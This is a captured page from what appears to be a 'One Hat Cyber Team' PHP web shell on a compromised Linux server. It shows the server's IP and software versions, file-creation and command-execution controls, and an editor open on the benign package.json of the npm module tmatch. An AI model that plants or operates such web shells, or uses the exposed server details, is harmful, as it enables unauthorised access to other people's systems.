One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
4518
/
root
/
usr
/
share
/
nodejs
/
tmatch
/
Edit File:
package.json
{ "name": "tmatch", "version": "5.0.0", "description": "This module exists to facilitate the `t.match()` method in [`tap`](http://npm.im/tap).", "main": "index.js", "scripts": { "test": "tap --100 test/*.js -J", "preversion": "npm test", "postversion": "npm publish", "postpublish": "git push origin --all; git push origin --tags" }, "repository": { "type": "git", "url": "git+https://github.com/isaacs/tmatch.git" }, "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)", "license": "ISC", "bugs": { "url": "https://github.com/isaacs/tmatch/issues" }, "homepage": "https://github.com/isaacs/tmatch#readme", "devDependencies": { "tap": "^12.5.1" }, "files": [ "index.js" ], "engines": { "node": ">=8" } }
Simpan